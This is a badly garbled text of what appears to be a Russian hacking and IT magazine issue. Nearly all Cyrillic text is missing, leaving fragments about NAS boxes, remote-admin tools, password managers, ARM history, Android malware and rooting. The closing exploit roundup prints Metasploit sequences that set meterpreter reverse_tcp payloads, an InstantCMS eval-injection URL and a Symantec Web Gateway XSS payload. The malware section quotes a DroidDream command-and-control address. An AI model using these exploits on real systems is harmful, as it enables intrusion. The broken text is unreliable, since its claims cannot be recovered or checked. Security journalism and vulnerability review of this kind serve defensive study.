X-RAID 2, RAID 0/1/5, JBOD
AFP, Bonjour, FTP, HTTP/HTTPS, NFS, SMB/CIFS,
UPnP, iSCSI, Telnet, SSH, SNMP, TFTP
, -,
, BitTorrent, Time Machine,
iTunes
, 2 , 4

04

:
:
:

:
:

03

05

06

QNAP TS-469 Pro

Synology DiskStation DS413j

Thecus N4800Eco

Intel Atom D2700, 2,13


DDR3, 1
2 RJ-45 (10/100/1000 /),
2 USB 3.0, 5 USB 2.0, 2 eSATA, 1 VGA,
1 HDMI
RAID 0/1/5/6/10, JBOD
CIFS/SMB, AFP, NFS, FTP, HTTP, HTTPS, Telnet,
SSH, iSCSI, SNMP, UPnP, Bonjour, WebDAV,
DLNA
, -,
, , -,
iTunes, BitTorrent, Time Machine

Marvell, 1,6
DDR3, 512
1 RJ-45 (10/100/1000 /),
2 USB 2.0
SH RAID, RAID 0/1/5/6/10, JBOD
CIFS, AFP, FTP, iSCSI, Telnet, SSH, NFS,
WebDAV, SNMP, Rsync, HTTP/HTTPS

Intel Atom D2700, 2,13


DDR3, 2
2 RJ-45 (10/100/1000 /), 2 USB 3.0,
2 USB 2.0, 1 eSATA, 1 VGA, 1 HDMI,
1 Line out
RAID 0/1/5/6/10, JBOD
SMB/CIFS, HTTP/HTTPS, FTP, TFTP, NFS, AFP,
iSCSI, Bonjour, UPnP

, -,
, Web Station, BitTorrent/
eMule, Time Backup

iTunes, , , -,
, ,
eMule

NAS

ASUSTOR AS-604T
Buffalo LinkStation Quad
NETGEAR RND4000-200EUS
QNAP TS-469 Pro
Synology DiskStation DS413j
Thecus N4800Eco


,
Intel Atom
.
Marvell.
. -
- -

. ,
Synology DiskStation DS413j. .
, Hi-End- QNAP, ASUSTOR
Thecus.


ASUS
PQ321QE
4K- ASUS

130 000
.

: 31,5
: 16:9
: 3840 2160
: 800:1
: 350 /2
: 8
: 2 2
: DisplayPort / RS232C / 3,5 Mini-Jack
: 750 489 256

802.11ac, ,
. 4K-
,
. 4K ,
,
. , , 4K . , 8,3
.
4K , .
,
AMD 7000- NVIDIA GTX
600- , 4K . ,
( E )
HDMI, DisplayPort.
Windows
8.1, .
ASUS .
31,5- 35 .


( 15 ), ( 30
) ( 45 ).

.
2 . USB-, ,
. VESA-,
.
, IGZO, . ,
45 .
, 4K-
, ASUS 350
800:1.

, PQ321QE .
. . ,
4K
.


PC
ZONE

41



ilembitov@real.xakep.ru


Netflix, Hulu, Pandora, Spotify
. , 810
, . ,
.


,
.
,
, , .

Spotify Pandora .
, .,
7 10
, . , . Pandora
- .

Hulu Netflix .
,
, .
on demand,
. Netflix . ,

, , .
. ,
, ,
- , .
, .

,
. Hulu , . - late night show,
Saturday Night Live America's Got Talent,
, .
.

, , ,
.


Netflix

Hulu

- Netflix DVD, . 90% , . . ,


. , . , Ivi.ru, on demand
iTunes Amazon Instant Video.

, . Hulu , , - ,
Netflix.
. , Hulu
-.
.

, , . Amazon Prime,
. , - Amazon,
Prime .

Pandora

Spotify

, . Pandora
, , . ,
, , .
,
. , Pandora
, .

Pandora , .
Spotify , , . , 20 , .
Pandora , Spotify .
. (10 )
- -.

Rdio, Google Play Music, iTunes Radio. , , (, Zvooq, Deezer). Pandora .



. ,
, .
Media Hint
(https://mediahint.com) . Firefox
Chrome.
pac- (mediahint.com/default.pac),
.
mediahint.com , , , .

DNS, ,
.
Pandora
,
Wi-Fi-
VPN.

NETFLIX
, . , . Android VPN
Google Play. TunnelBear (tunnelbear.com). iOS ,
,
, .
iTunes .
,
. App Store, , .
iTunes .
. , ,
, .
, , . VPN IP,
DNS-. DNS , . , Wi-Fi-,
. VPN- TunnelBear,
Hideman (hideman.net) Spotflux (spotflux.com)
, .
,
DNS.
DNS-. Tunlr
(tunlr.net) Hulu, Netflix,
Unlocator (https://unlocator.com) . ,
, Unlocator Hulu ,
, , , . UnoDNS,
5 ( VPN).
, , .
.
. QIWI

Apple TV

,

Apple TV ,
.

Netflix

.

Fayve ,

(https://visa.qiwi.com). .
, QIWI,
. Google Maps,
Apple Store.

TunnelBear
VPN


DNS



.
.


Hulu Netflix


,

.
,
.
, Fan (fan.tv)
iOS, Fayve (fayve.com) iOS Android.

, , , . , HTPC , (
).
, , Apple TV. 4500 , Hulu Netflix.
DNS,
.
.
DNS- ( ). Apple
TV. Apple ID.
. , Home Sharing
Apple- iPhone
.
, Roku.
-, , , DNS . , .
, Roku
. Google TV, .
Hulu Netflix Xbox 360 PlayStation 3. X360. IP, , . ,
, :
1. DNS.
2. .
3. .
4. Hulu Netflix.
5. , .
. , , Netflix , . , Xbox 360 Xbox Live Gold ( 240 ),
PS3 .
.
Pandora Netflix,
HD
- (
).



dhsilabs@gmail.com

.
, . ,
, , , .
RADMIN (SHAREWARE)

Radmin, (www.radmin.ru) . .
: Server
Viewer.
( ),
,
.
, .
portable- Viewer, , Radmin Server 3.5 NTI ,
,
Radmin, .
:
Windows 8 32/64 bit,

Windows XP/Vista/7/8,
Wine (Radmin
Linux Wine), Telnet,
, Radmin ( ,
),
Server Viewer.
:
+ : , , .
.
+
Server,
, . , ,
.
-

,
, .
+ ,
,
AMD, , .
- Server , .
- TeamViewer
, ,
- ( 80-
) .
Radmin Server 4899, .
- .
- .

. 3.

. 1. Radmin Server

. 2. Radmin Viewer


TEAMVIEWER (FREEWARE)
, ,
TeamViewer.
. .
portable-
Windows,
, portable ,
, Radmin,
(Viewer) ,
.
TeamViewer (. 4).
,
,
, , .
, .
, ID ( 969 930 547) (8229). ,

, , ,
SMS .
. , ,
: .
, ID
( 411108007)
, -

ROYAL TS (SHAREWARE)
- mRemote.
, , mRemote
,
Royal TS (www.royalts.com/main/home.aspx). Windows, OS X iOS (
iPhone iPad).
Royal TS
, = . Royal TS
,
, .
. shareware-

. ,

, , - (, ,
).

Radmin TeamViewer. ,
. , Radmin Server
TeamViewer, Radmin
Viewer TeamViewer . , Royal
TS - Radmin Viewer,
,

. 4. TeamViewer

. 5. TeamViewer

,
. (. 5).
,
Radmin: , , Radmin
. , . , TeamViewer (,

Run) .
, ,
,
.
, : TeamViewer Host.
, / .
TeamViewer Host ,
,
TeamViewer.

TeamViewer (
Host), , ,
( ) . ,
, ,
, .
Radmin, TeamViewer ,
,
.

. .
Royal TS ,
.
Royal TS RDP, Telnet,
SSH, Citrix, VNC.
. Linux (Ubuntu
) VNC-.
VNC-:

:
.
.
.
.
Android, iOS WP8

( 25 ).
+ .
- ,
Radmin.
- .
+
+
+
+
+
+

Royal TS, .
.

sudo apt-get install vnc4server


:

sudo vnc4server
, .
$HOME/.vnc/passwd.
vnc4server, :

. 6. Royal TS Windows

sudo vnc4server :3
Royal TS ( File),
Edit VNC.
(Display Name) :3, IP- VNC-
( 5900). .
:
+
.
+ Windows, OS X iOS.

. 7. VNC


SUPREMO (FREEWARE)


.
TeamViewer
(
-
), Radmin
- ,
.

Supremo, www.supremofree.com/index.aspx.
(. 8) TeamViewer. ,
TeamViewer, ( ID ).

Windows.
Windows, Windows 7
Windows Server 2008 R2. Windows
8 Windows Server 2012
.
: ,
ID ,
.
, . ,
TeamViewer.
, ( ).
(. 9) ,
, ID
.

(. 10) -, .
,
, .
(
, )
drag & drop.

. 8. Supremo

. 9. Supremo

. 10. Supremo

LOGMEIN (FREEWARE)

LogMeIn (. 11).
, , , . logmein.com
,
LogMeIn Free. :
Windows OS X, ,
, , ,
,
SSL/TLS, , .

,
:
,


, .

TeamViewer .
Mac
, , (.
12). logmein.com , ,
.
, ,
. : , ,
, -, ( email,
). - ( ),
- , .

, .

. ,
. (

).
.
, . ,
.

. 11. LogMeIn

. 12.

. 13.

+
+
+
+
-

+
+
+
+
-

:
, .
.
.
( HTTPS/SSL).
, Windows.
.

:
.
.
.
.
.


SSH-

ULTRAVNC/REALVNC (FREEWARE)
VNC (Virtual Network Computing)
, RFB (Remote
FrameBuffer). Windows
UltraVNC (uvnc.com) RealVNC (realvnc.com).
,
UltraVNC.
VNC, . ,
, VNC-
.
, .
RFB, VNC,
5900
5906. , VNC
, .
VNC- UltraVNC Viewer. , VNC-,
, UltraVNC Server.
,
UltraVNC Server, RoyalTS VNC-.
, . UltraVNC Edit Settings
Security
VNC-, UltraVNC Server.
UltraVNC Viewer (. 14) IP

. 14. UltraVNC Viewer

, VNC-, Connect.
:
,
.
+
Windows, OS X Linux,
,
VNC.
-

AMMYY ADMIN (FREEWARE)

ANYWHERETS (FREEWARE)

Ammyy Admin (www.ammyy.com/ru)



. ,
,
(
700 ),
, ,
.
.

AnywhereTS (anywherets.sourceforge.net) .

,
,
. AnywhereTS
, , ,
.

WINDOWS 8
( , )
:
SystemPropertiesRemote.exe.

.

.
, ,
.

.


SSH. ,
? , ,
?
?
, .
Linux
Gnome Connection Manager (kuthulu.com/gcm). ,
.
Windows AutoPuTTY SSH/Telnet- PuTTY,
: www.r4dius.net/autoputty. SSH- OS
X Shuttle (https://github.com/fitztrev/shuttle).
SSH-
Prompt (iOS) ConnectBot (Android).

.

INFO

. 15.


Google: Chrome
Remote Desktop,
Chrome
(bit.ly/VLleMl).


. , , ,
. ,
. ,
. dhsilabs@mail.ru.

MOSH (MOBILE
SHELL):

SSH

Mosh (mosh.mit.edu)
(

).
Mosh SSH ,

, ,
( , Wi-Fi,
IP,
). .
:
SSH- Mosh ,
Mosh. Mosh
, SSH, ,
root-. Mosh
Linux BSD, OS X, iOS
( iSSH)
Android.

GOOGLE HANGOUTS:


Google
Hangouts (google.com/+/learnmore/hangouts/?hl=ru). ,

.

.



wronglink@gmail.com

, .
. ,
- .
, , ,
.
. ?



. , ,
. , ,
, -
- .
, , ,
.

1PASSWORD
agilebits.com/onepassword
Win, Mac / Android, iOS
AgileBits . ,
, . -
.

. (

),
.
,
, AES256.
: Dropbox

KEEPASS

49

keepass.info
Linux, Mac, Win / Android, iOS, Win Phone
KeePass Linux , . Windows, GPLv2,
, Linux
OS X, KeePassX.
.
(keepass.info/download.html).

AES-256, - SHA-256. ,
, Dropbox.
, ,
Dropbox .
KeePass : /
, ,
, . (keepass.info/plugins.html).
,
. (1 2)
, .
,
.
, , iOS. ,
.

iCloud. ,
.
portable, JS HTML,
. (help.agile.ws/1Password3/1passwordanywhere.html).

Apple, . ,
: 50
.
Linux , Android
1Password , .


DASHLANE
www.dashlane.com
Mac, Win / Android, iOS

STRIP
getstrip.com
Mac, Win / Android, iOS
Strip Zetetic. ,
, .
Windows OS X. :
Android iOS.
SQLite
AES-256
SQLCipher (sqlcipher.net). C
( : Google Drive Dropbox),
Wi-Fi.
, ( 1Password, ) : 5 ,
10.
, Strip

. , , ,
.

Linux-.

Dashlane
. , ,
( , Linux ) .
AES256.
.
Google Authenticator,
. , ,
,
- ( , ,
). .
,
.
.
-, , . , ( , -), ,
20 .

Linux , .


MY1LOGIN
https://www.my1login.com/content/index.php
Mac, Win, Linux / Android, iOS, Win Phone
My1login , - LastPass,
.
-, ,
. - :
, .
,
. ,
,
. -
, -
. .
, , . ,
. : .
, My1login

.

LASTPASS
lastpass.com
Mac, Win, Linux / Android, iOS, Win Phone
LastPass .
, , ,
. -
. , ,
.
.

AES-256
LastPass. portable, , Windows.
, (
webOS Symbian). , ,
Android ,
Dolphin.
, , . -
12 .
, . ,
.
,
, .

BLUEPASS
https://bluepass.org
Mac, Linux

Bluepass
,

:
GPLv3

;
,
- ;

;

P2P

.

, :

.

, Linux OS X.

,
100% .
60 000 (,
, ).
,
.
,
.

,
.


ARM
,


, .
, .
Intel ,


.
,

, Intel.
ARM, .
,
?
ARM Holdings 1990 , ,


: Apple Computer, Acorn Computers
VLSI Technology. Apple , Acorn VLSI
.


Acorn Sinclair Research,
ZX Spectrum.
Acorn
Sinclair Radionics ( Research).
,
1978


apismenny@gmail.com

ZX80 ( ZX Spectrum)
, .
,
. Cambridge Processor
Unit, CPU.


. ,
.


Acorn

MOS Technology
6502. ( ),
.
. , ,

MK14,
.
CPU ,
,
.
1979 CPU Acorn
( ),
Apple.

, Acorn System 1.
, - 80 . , ZX80,
, .
Acorn
, BBC (-,
,
)
, BBC
Micro.
,


.

,
,
.
ARM.
, -


Acorn System 1 ,

-
(DARPA), DARPA,
. VLSI Project :
. VLSI Very-large-scale integration
, .

,
.
,
,
, ,
, . , - ,
.

Xerox PARC
(),
. ,
DARPA , :
.
Sun Microsystems Silicon Graphics,
UNIX Berkley
Software Distribution(BSD).
, ,
.
, :


. ,

.

RISC
: CISC (Complex Instruction
Set Computing -

) RISC (Reduced Instruction Set


Computing ). , .

Intel 8080 Motorola 6800
. ,
,
.
,
.
, , , ,
. .
, , , ,
, .
. Intel, , 80- .
, ,
.
,
.
VLSI

, ,
RISC. ,
,
,
.
, :
!
,
, .


Archimedes ARM


.
RISC ,
CISC,

.
,
.
, , ,
.


, , Acorn. ZX Spectrum,
1983 : BBC Micro
,
Acorn .
MS-DOS BASIC BBC Micro,
.
Acorn
, ,
:
.
National Semiconductor,
-
:
,
.
Western Design Center,
:

, -

. : ,
? WDC ,
, .
Acorn , . , .
RISC.
ARM (Acorn
RISC Machine) 1985 , .
BBC
Master BBC Micro

.
RISC.

ARM2 :
Archimedes, 1987 . ARM2 32-
,
26 , 64 (

). ARM2
- , 1985 8
. Intel 80368 , , . 386-
ARM2. , RISC!
Archimedes
800 (

), ,
( 256 ) . ,

Macintosh
.

OLIVETTI
Archimedes Acorn,

. 1983
1984-, .

: Atari Commodore ,
Apple ( ) .
Acorn -
: -
,
, . Acorn 250 ,
.

Olivetti.
. Olivetti 1983 1985 Zilog Z8000 Intel 8088. ARM,
Archimedes RISC OS
Olivetti .
.
,
Olivetti 80
Acorn, . Acorn ,
, General Information Systems.
,
.


BBC Micro
,
ZX Spectrum

- ARM

, , :
80-
IBM PC . , PC
, , ,
.
Olivetti HP,
Palm, Android.
,
. : , IBM,

. , ,
Acorn ARM, IBM Intel . , IBM
Acorn .
.

RISC

. ,
VLSI .
VLSI
.
, (
).
Acorn, :
, ,

.
Intel ,
, ARM .
ARM
Intel AMD,
.


, Olivetti
,
ARM.

.
, ,
ARM, Acorn RISC
Machines Advanced RISC Machines.
RISC?
, ,
. Apple: 1990

Newton, ARM
.

VLSI Technologies. VLSI Project, -

ARM
IBM PC 90-
RISC . , Intel Microsoft,
x86 . : IBM Sun Microsystems,
PowerPC SPARC , ,
ARM .
, ARM Holdings
Acorn, ARM6, Newton
Apple. ARM6 1992 , 1993- .
-

ARM , 1998
. ,
, Apple :
,
ARM .
,
Apple ARM
?
ARM
. ARM
- . Intel
ARM (
XScale, 2006
).
ARM
. Apple Newton
Pocket PC , iPhone
2007 iPad 2010-.
RISC
, , Intel ARM ,
x86
.
ARM RISC
,
. ARM
(, , -
Facebook)
64- ARMv8. ARM
, . IBM,
,
, .

X-Mobile


Android
Android
2010 DEF CON 18. , Google , Google
.
Android .
,
15
Android

Android SDK 2007 .
,
SMS, , Blitz Force Massada, 30 Android, ,
API Android .
,
, . ,
, Mobile Spy Retina-X
Studios, , , , ,
.
,
2010 , ,
, .
-
2010 - Trustwave, DEF CON 18. ,
;
Linux,
write(), read(), open() close(), .
,
.

, root- HTC Legend (
), . Proof of concept, , Linux
Linux.
( ) 2010 . ,
, ,
SMS-, , , , SMS . ,
,
, .
, Trojan-SMS.AndroidOS.FakePlayer.a,
Movie Player
Windows. -

, SMS ,
.
, SMS
3353 3354,
. , , , .
SMS-.
, .

SMS .
,
,
, , .
,
, .
,
SMS, . SMS, red4life.

GEINIMI --
- Android 2010 Lookout. , Geinimi, ,
,
:
.
, , Geinimi . ,
Monkey Jump 2, President Versus Aliens, City Defense and
Baseball Superstars 2010, torrent-.
, .
. , , ( ,
DES 12345678).


execbit.ru



Zeus

INFO


Symantec


.
Geinimi 20 ,
, (, ), .

Geinimi .

, :
, IMEI IMSI. (www.widifu.com, www.udaore.com, www.frijd.com ),
.
Geinimi Android,

. Geinimi ADRD, Android.Pjapps
. , torrent-, , , .
, DroidDream, 50 , Android Market.

DROIDDREAM

2011 Lompolo reddit,


Android ,

Geinimi Android,

, Superclean

Myournet. ,
, ,
, ,
rageagainstthecage root , -.

56, ( , )
Kingmall2010 we20090202.
DroidDream
Geinimi, . , (http://184.105.245.17:8080/GMServer/GMServlet)
. ,
assets/sqlite.db APK
DownloadProvidersManager.apk. , .
50
200 ,
Google
.
Android Market Security Tool, .
. Symantec
, , Fake10086
SMS 10086.
Android Market (
DroidDream ) Google ,
, 2012
Bouncer,
.
Bouncer , ,
. ,


2011 :
Android

,
.
Google, Bouncer 40% (
, ). ,
, , email-
, , ,
. , Google Bouncer (,

).

ZEUS-IN-THE-MOBILE
Zeus. , ,

;
.
Zeus
man-in-the-browser,
.
Zeus (Facebook, Yahoo!, hi5, metroFLOG,
Sonico, Netlog) , , -.
Zeus 2010
Symbian BlackBerry ,
SMS-
. 2012
Android.

-, .
,
SMS . -

Zeus Android
,
.
Zeus - , , , .

IRC-
2012 , Android
IRC-. APK- 5
Madden NFL 12.
, , , Linux, Android
root.
/data/data/com.android.bot/files, -


Superclean.


2012
Symantec
,

Android

Backdoor.AndroidOS.Obad.a

: header01.png, footer01.png, border01.png,



Gingerbreak root .
,
root ,

( , ).
root
, SMS Foncy SMS.
SIM- ,
. border01.png, IRC-. IRC-
IP- 199.68.*.* #andros
. , , Linux-.
, Android. , , , ,
Android 2.3.


2012- Symantec , Android,
, (). ,
Android.Opfake,
-,
,
.
,
. APK-
, ,
,

.
,
, .

res/raw/data.db (
)
SMS. -,
. ,
,
.

-
, 1 2012
securelist.com , ,
Google Play. Superclean, , ,
.
1000 5000 4,5
.
, Superclean ,
Java.
, . ,
, : autorun.inf, folder.ico
svchosts.exe.

USB- , svchosts.exe. svchosts.exe Backdoor.MSIL.Ssucl.a, -



.

Android. , Wi-Fi, ,
,
SD-, SMS-
.

GOOGLE,

2012 Android
, Google .
-
VirusTotal, 29 Android 4.2,

Google Play
.
, Google
VirusTotal ,
, Google, , VirusTotal
Android .



Android , .
Backdoor.AndroidOS.Obad.a. , , ,
.
, ( root,
Android),
: . . Android,
, -
, , .


root
Wi-Fi- .

, IMEI, MAC- .

. : , ,
, , Bluetooth,
.
.
. -,
dex2jar, -
. -,
Android, Manifest.xml,
, ,
Google, . - .
, ,
, ,
( ). ,
facebook.com, -
, ( , , ).

WWW
DEF CON 18,

Android:
goo.gl/WM0tBz

reddit
DroidDream:
goo.gl/MnTcb

Android ,

Android. .

Android
.
.

?
Android , Symbian
Windows CE. 2004 29A
Symbian Series 60,
Cabir (Worm.SymbOS.Cabir). Bluetooth
,
Caribe . 29A
,
, -
, .
Windows CE Virus.
WinCE.Duts. PocketPC 2000, PocketPC
2002, PocketPC 2003,
Bluetooth MMS,
.
Cabir, 29A .

Windows CE : Backdoor.WinCE.Brador.
,
.
,
, , SMS-, .
Brador
SMS-, Symbian.

Mosquitos,
Trojan.SymbOS.Mosquit.a. -.

,
,
SODDOM BIN LOADER.

,

Symbian. , Trojan.SymbOS.Locknut,
Govno,

,
. Trojan.SymbOS.Fontal
, -
. Trojan.
SymbOS.Dampig Trojan.SymbOS.Hoblle , Trojan.SymbOS.
Drever .
iOS, . -
API
.

.
App Store. Find and call, VoIP, ,

( , ).




,
, Android
, , Android-, , , Windows, .
, Google Play.

:
Google ,
(Android
SDK, adb, fastboot, ),
.
, root , ,
.
.
, , zip- .
.
, , , . ,
.

, .
, , Google .
, , zip, ,
, , , , ,

? , .
, ,
.

). , .
ClockworkMod TWRP.
! ,
,
root. root Nexus
Android. : root CyanogenMod Google .
, .


execbit.ru

?
, , . CyanogenMod
( AOKP, ParanoidAndroid
SuperVasyaAndroidModPlus) franco.kernel.
zip-. c -
( ,

CyanogenMod
OTA-

franco.updater
,


ROM Manager ClockworkMod Recovery

TWRP Manager: TWRP Recovery

ROOT
- root. , , . , Android Android-.
, ,
. :
1.
, !,
USB ( Android 4.2,
).
2. USB-,
(MTP) (PTP) , .
3. iRoot (goo.gl/CwHLV) .
4. .
5. ROOT , .
iRoot root

, iRoot

Android 2.34.2.2,
Huawei, , .


SuperUser , , root,

.

RECOVERY


. ,
Recovery-Tools, ROM
Manager TWRP Manager.

, , -

: Flash Clockworkmod Recovery Flash


TWRP Recovery. . , ,
, , TWRP
, , .
, Recovery-Tools
,
, .
ROM Manager,
ClockworkMod,
. , ,
Recovery Setup ClockworkMod Recovery, .
, ,
. ,
. , .

( ,
- ).


, ,
, . , , .

GooManager. , : goo.im.
( Gmail ),
- , ,
GooManager, , .
, , . , , - .

: Browse Compatible ROMs
(, aokp cm) Begin
Download Order & flash selected Flash. ,


GooManager

, .
.
, ,
Google : Download gapps packages
Yes Order & flash selected. , ,
Gapps ,
. (Order & flash selected)
gapps, .
TWRP
Recovery; ClockworkMod ROM Manager.
, GooManager
, .
,
, ,
( Order & flash selected)
Wipe data (factory
reset). .


, . , , . ,
,
, , , ,
, .
, Google Play.

,
, . :
franco.Kernel updater Nexus
( Samsung Galaxy Nexus, LG Nexus 4, Asus
Google Nexus 7 Samsung Nexus 10).
,
;
Trinity Kernel Toolbox
Trinity, Nexus-, Samsung Galaxy Note II Galaxy S III.
,
114 ;

CyanDelta
Android, 3

Recovery-Tools:

GLaDOS Control , , , GlaDOS (Galaxy Nexus Nexus 7).


. 81 .


. , , ,
,
GooManager. :
1. XDA (forum.xda-developers.com) 4pda (4pda.ru), , (, ) . 510 ,
( Wi-Fi).
2. ,
Download , goomanager,
.
3. GooManager, Flash ROMs,
, Order & flash
selected, , , Flash.

, GAPPS

, , Google
; -, , .
, , Android,
. , . ?

, , ,
:

. , , , Android. Recovery-Tools, ROM
Manager TWRP Manager.
, / , Android .
.
, ,
, -

INFO
TWRP Manager


TWRP Recovery
Android:
,
,
,


Nandroid Manager

INFO


Online Nandroid Backup:


. Google .
(factory reset) Google . , , ( ,
Helium Titanium Backup).

, .
,
, ,
. .
GooManager,
goo.im , .
, .
CyanogenMod ,
.
,
,
. CyanogenMod.
,
( ).
,
200 ,

.
CyanDelta, .
210 ,
. :

( ),
.


AOKP
,

,

AOKP.co.

, .
: Helium Titanium
Backup ,
Nandroid.
, ,

, , , .
Nandroid
,
Online Nandroid Backup, .
Google Play.
(, , ) ,
( ),
. ClockworkMod-
,
ClockworkMod,
Backup Mode CWM Incremental.

, - TWRP,
.
,
Quick Backup, .
,
.

Nandroid Manager.
, , , , ,
, , ,
, Wi-Fi,
, .
, -
. .


Android ,
Android.
, , . ,
- , ,
Android,
, boot-
,
.




. ( Black Hat
DEF CON). . , . ,
IT
. .



- ,
(

Microsoft, Cisco, Oracle, LPI
),
.
,
, .
IT- ,

- IT-.

,

.
H1B, , .
,
, .
,
.
, -

.
,
H1B
.
, , ,
.
, ,
,
- ,
.

, -
. ?
IT . ,
. 2013
95 000
120 000 .
:
IT- 65 000 ,

50 000.
, 75 000 ,
27 000 .
, .
25% ,
100 000
75 000 .
, .
, .

.


, ,
, .

, IT-. Win-win.


ESET

1999 -. 2003 HR- .


IT- Net2S a -C.
2006 MBA Grenoble Graduate School of
Business .
2011 ESET Russia.


EASY
HACK

GreenDog ,
Digital Security
agrrrdog@gmail.com,
twitter.com/antyurin

, NMAP

Nmap , . , .
Nmap , .
: Nmap NSE- . Nmap -

Nmap

(-
- :)). , NSE Lua, , .
SNMP ColdFusion.
, Scip AG (www.scip.ch)
NSE- vulscan. .
Nmap
( , )
: CVE, OSVBD, SecurityFocus SecurityTracker, scipvuldb.
( CVS-).
, , - .
. , false-positive.
- Mozilla , . :).
, , -
- .
.
, : scip.ch/en/?labs.20130625, vulscan.nse scripts Nmap,
scripts/vulscan. NSE, sC ( default safe ).
(scipvuldb),
.

nmap -sV --script=vulscan.nse --script-args vulscandb=scipvuldb.csv -p465 target_ip


, NMAP

, ,
- .
Nmap ? ,
. - tcpwrapped ftp?, ?
(false negative) , ,
Nmap.
, . ,
, open open|filtered, ( sV ).
open|filtered ,
open. , .
, , Nmap, nmap-services nmapservice-probes. (FTP,
HTTP, DNS) . Well known , .
IANA (1024 ).
() (Service).
.
Nmap (http?, ftp?), , Nmap , /.
, - .
, , , ,
, ( ,
).
. (Probes), Nmap . ,
, ,
regexp , .
, , , (
).
( TCP) NULL.
, Nmap , 6
. , (FTP,
SMTP, SSH), .
NULL- ().
, . ,
GenericLines (\r\n\r\n).

. , UDP- NULL-
(- ).
,
. :

Nmap

Probe TCP NULL q||
match activemq m|^\0\0\0.\x01ActiveMQ\0\0\0|s p/Apache ActiveMQ/
match ftp m|^220 3Com 3CDaemon FTP Server Version ([\d-.\w]+)\r\n| p/3Com 3CDaemon ftpd/ v/$1/
Probe TCP Help q|HELP\r\n|
match finger m|^iFinger v([\d-.\w]+)\n\n| p/IcculusFinger/ v/$1/
match irc m|^:([-\w_.]+) 451 \* :You have not registered\r\n$| p/IRCnet-based ircd/ h/$1/
, . (match) regexp ( Perl),
, .
. .
-, , . softmatch .
, (). , (
-) POP3.

softmatch pop3 m|^\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n$|


(
), Nmap , (GET / HTTP/1.1, ), .
(Help\r\n, ).
nmap-service-probes. ( NULL) ,
(, ), (rarity)
. , . 1
9. 7, .

Probe TCP Hello q|EHLO\r\n|
ports 25,587,3025
rarity 8
, , , , , , fallback.
, .
NULL-. , , ,
NULL. fallback
, NULL.
. SSL-. , ( NULL), SSL-.


Service SSL ( ssl/


pop3). , SSL , .
, ,
. -, Nmap ,
, ,
( ports nmap-service-probes). -, Nmap
(
rarity). , . EHLO , , (7),
(SMTP 25, 587, 3025). , , - . , .
. ,
, Nmap,
. - ,
. , --version-light, 2,
, , .


, Nmap ,
--version-all,
. Nmap, , , , .
. (
) --version-trace, , (, ,
).
, , , tcpwrapped Version.
, , tcpwrapped *nix,
ACL . , . , tcpwrapped . ,
tcpwrapped Nmap, ,
, . , ,
, false-negative Nmap, -
NULL- 6 . .
, . , (goo.gl/a44IJu).

FLASH-

-, -. ,
. . , Adobe
ActionScript 3.
: XSS - ,
. , ( XSS), () .
.
, . :)
. . ,
, -,

. , , , ,
swfinvestigator (goo.gl/Ajhd9), . , , .
, , , SWF
, ,
. -, . , .
AS3, .
Sothink SWF Decompiler, ( ). , , , - ,
- .
, .
.
, ,
,
.

SWF


, .
. , , ,
. , SearchDiggity (goo.gl/BfCYz). ,
Google Bing,
( FOCA), ShodanHQ,
flash- regexp . : -


, ,
.
HP SWFScan (goo.gl/6FA1F). SWF
AS2, AS3 . SWF , .
, ( , ). , .

SearchDiggity -
SWF .

WARNING

. ,

,
.

WINDOWS

IntelComms (goo.gl/SIq97)
Windows 7 , . .
, , , ,
, : ,
, . .
, ,
. ,
(System Recovery). , (Safe mode),
. System Recovery
.
, .
Reset <Ctrl + Alt + Del>. , , :
Start Windows Normally;
Launch Startup Repair (recommended).
, .
Startup Repair, ! GUI-,
:
1. System Recovery.
2. Restore your computer using System Restore .

3. View
problem details.
4. , , , Notepad.
5. .
, ,
.
, System Recovery , -, , -, - , -, NT
AUTHORITY\SYSTEM.
? . , ,
- , ( )
cmd.exe.
? , , , . :).
, (, , ?).
-, .
, . , , . , !
. , :). Easy Hack
. :).
!


WARNING

.
,
,
.

, (Esage Lab)
dukebarman@xakep.ru,
@dukebarman

Java, , .
Symantec Web Gateway.

Carberp.


COREL PDF FUSION

CVSSv2:
:
:
CVE:

N/A
8 2013
Kaveh Ghaemmaghami
2013-3248

.
. ,
XPS- ZIP-,
( Windows 7zip) , .

TARGETS
Corel PDF Fusion 1.11 .

SOLUTION
Corel PDF Fusion , ,
PDF- 100 , doc, WPD, JPG, TIFF, GDF, XPS, CAD, docx PPTX.
XPS
XML Microsoft. docx,
ZIP-.
, ,
XPS-.

EXPLOIT
Metasploit, .

msf > use exploit/windows/fileformat/corelpdf_fusion_bof
msf exploit(corelpdf_fusion_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(corelpdf_fusion_bof) > set 192.168.24.141
msf exploit(corelpdf_fusion_bof) > exploit

Corel PDF
Fusion


JAVA APPLET
PROVIDERSKELETON
CVSSv2:
:
:
CVE:

9.3 (AV:R/AC:M/Au:N/C:C/I:C/A:C)
18 2013
Adam Gowdiak
2013-2460

Java. invoke() ProviderSkeleton.


-, . (bit.ly/13RcwV8)
Security Explorations , . () lookupClass,
forName, .

Windows

EXPLOIT

TARGETS

, Metasploit- :

InstantCMS =< 1.6. ,


1.7, .

msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_provider_skeleton) > set 192.168.24.141
msf exploit(java_jre17_provider_skeleton) > exploit

(bit.ly/179thsk) .

TARGETS
Java 7 update 21 .

SOLUTION
.


INSTANTCMS 1.6
CVSSv2:
:
:
CVE:

N/A
26 2013
AkaStep
N/A

CMS, - .
(, ). ,
eval.

if ($look == 'phrase'){
    $against .= '\"'.$query.'\"';
}
...
eval('search_'.$component['link'].'("'.$against.'", "'.$look.'", "'.$mode.'");');
, ,
:

site.com/index.php?view=search&query=${echo phpinfo()}&look=allwords

phpinfo().

EXPLOIT
:
phpinfo() . , , .
AutoIt. .
Metasploit-.

SOLUTION
. ,
htmlspecialchars().


SYMANTEC WEB GATEWAY 5.1.0
CVSSv2:
:
:
CVE:

N/A
27 2013
Wolfgang Ettlinger
2013-1616, 2013-4670, 2013-4671, 2013-4672


Symantec. Symantec Web Gateway

. ,
Insight .
210 ,
,
. :
1. XSS cookies
.
2. XSS
. ,
.
3. , .
apache. (,
),
.
4. (, apache) - sudo.
5. SQL- ,
SQL-, .
6. CSRF ( ) , .
,
, . .

EXPLOIT
XSS alert():


https://<host>/spywall/feedback_report.php?rpp=0%27%20onfocus=%22alert%28%27xss%27%29%22%20autofocus/%3E
1. XSS blocked.php,
. , u:

